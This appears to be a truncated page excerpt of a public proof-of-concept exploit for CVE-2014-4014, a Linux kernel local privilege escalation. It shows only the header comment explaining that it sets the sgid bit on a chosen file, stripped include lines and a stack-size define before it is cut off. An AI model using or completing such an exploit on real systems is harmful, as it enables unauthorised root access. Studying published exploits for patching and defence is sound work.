Linux Kernel Local Privilege Escalation PoC

/** * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC * * Vitaly Nikolenko * http://hashcrack.org * * Usage: ./poc [file_path] * * where file_path is the file on which you want to set the sgid bit */ #define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #define STACK_SIZE (1024 * 1024) static char […]